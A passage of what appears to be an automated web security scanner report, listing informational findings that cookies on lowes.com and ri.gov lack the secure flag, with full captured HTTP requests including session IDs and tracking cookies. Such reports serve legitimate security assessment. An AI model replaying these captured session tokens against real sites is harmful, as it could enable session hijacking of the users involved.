Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jul 2009 13:05:12 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 154101
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

7.110. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Oct 2010 17:00:00 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 72756
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

7.111. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 11 Nov 2010 21:24:51 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 11
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/* empty */

7.112. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 28 Apr 2009 19:56:32 GMT
ETag: "1f8e59-22f6-dc02bc00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 8950
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it u
...[SNIP]...

7.113. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS176ebc=8af291dbf163c57592847d6d73d5eb85d172642e494065004e1ce3f1; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c

Response

7.114. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS176ebc=3557926829ef74993d5214d92b1ba1ff3ddff0b185006e134e1cbb8e; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpL0emnRAXCBEyb1P3TIgvN33O5bKg83oIP9HgETjY0njRr0u8xYTB20%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; cmSessionDepth=2; lowes-prefs={"zipin":{"show":false}}; stop_mobi=yes; TSdcd8fd=9bfed736835c96972761a89519e0d94422df7bb2eaf0e7a04e1cbbb4

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 21:31:37 GMT
Content-Length: 68157
Connection: keep-alive
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:01:37 GMT
Set-Cookie: TS176ebc=3557926829ef74993d5214d92b1ba1ff3ddff0b185006e134e1cbb8e; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta chars
...[SNIP]...

7.115. https://www.ri.gov/Licensing/renewal/license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/Licensing/renewal/license.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Licensing/renewal/license.php HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
